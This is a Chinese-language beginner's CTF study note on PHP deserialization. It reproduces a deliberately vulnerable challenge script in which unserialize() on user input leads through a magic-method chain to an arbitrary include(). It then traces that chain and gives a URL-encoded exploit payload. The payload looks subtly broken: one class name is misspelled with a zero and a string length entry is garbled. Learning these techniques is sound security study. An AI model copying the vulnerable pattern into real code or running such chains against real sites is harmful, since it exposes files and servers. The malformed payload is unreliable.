Web入门

一篇基于想到什么写什么的Web初学笔记

基于php的反序列化漏洞

一些题目可以自己编写并运行Php代码生成反序列化的payload来找到flag

php序列化

因为 PHP 文件在执行结束以后就会将对象销毁，为了长久保存对象而提出的，下次使用只需要反序列化即可

目的是方便数据的传输和存储. json 是为了传递数据的方便性.

找到一篇非常好的文章PHP反序列化从初级到高级利用篇 - fish_pompom - 博客园

实战实例

<?php
if (!isset($_GET['xusheng'])) {
?>
<html>
<head><title>Reward</title></head>
<body style="font-family:sans-serif;text-align:center;margin-top:15%;">
<h2>
想直接拿奖励？
</h2>
<h1>
尔要试试我宝刀是否锋利吗？
</h1>
</body>
</html>
<?php
exit;
}
error_reporting(0);
ini_set('display_errors', 0);
?>
<?php
// flag.php
// 犯疆土者，盛必击而破之！
class GuDingDao {
    public $desheng;
    public function __construct() {
        $this->desheng = array();
    }
    public function __get($yishi) {
        echo "__get";
        $dingjv = $this->desheng;
        $dingjv();
        return "下次沙场相见, 徐某定不留情";
    }
}

class TieSuoLianHuan {
    protected $yicheng;
    public function append($pojun) {
        echo "append";
        echo $pojun;
        include($pojun);
    }
    public function __invoke() {
        echo "__invoke";
        $this->append($this->yicheng);
    }
}

class Jie_Xusheng {
    public $sha;
    public $jiu;
    public function __construct($secret = 'reward.php') {
        $this->sha = $secret;
    }
    public function __toString() {
        echo "__toString";
        return $this->jiu->sha;
    }
    public function __wakeup() {
        echo "__wake";
        if (preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->sha)) {
            echo "你休想偷看吴国机密";
            $this->sha = "reward.php";
        }
    }
}

echo '你什么都没看到？那说明……有东西你没看到<br>';
if (isset($_GET['xusheng'])) {
    @unserialize($_GET['xusheng']);
} else {
    $a = new Jie_Xusheng;
    highlight_file(__FILE__);
}
// 铸下这铁链，江东天险牢不可破！

Jie_Xusheng 的 __wakeup →Jie_Xusheng 的 __toString →GuDingDao 的 __get →TieSuoLianHuan 的 __invoke → TieSuoLianHuan 的 append

以下为序列化的payload构建

O%3A11%3A%22Jie%5FXusheng%22%3A2%3A%7Bs%3A3%3A%22sha%22%3BO%3A11%3A%22Jie%5FXusheng%22%3A2%3A%7Bs%3A3%3A%22sha%22%3Bs%3A10%3A%22reward%2Ephp%22%3Bs%3A3%3A%22jiu%22%3BO%3A9%3A%22GuDingDa0%22%3A1%3A%7Bs%3A7%3A%22desheng%22%3BO%3A14%3A%22TieSuoLianHuan%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00yicheng%22%3Bs%3A8%3A%23 2flag%2Ephp%22%3B%7D%7D%7Ds%3A3%3A%22jiu%22%3BN%3B%7D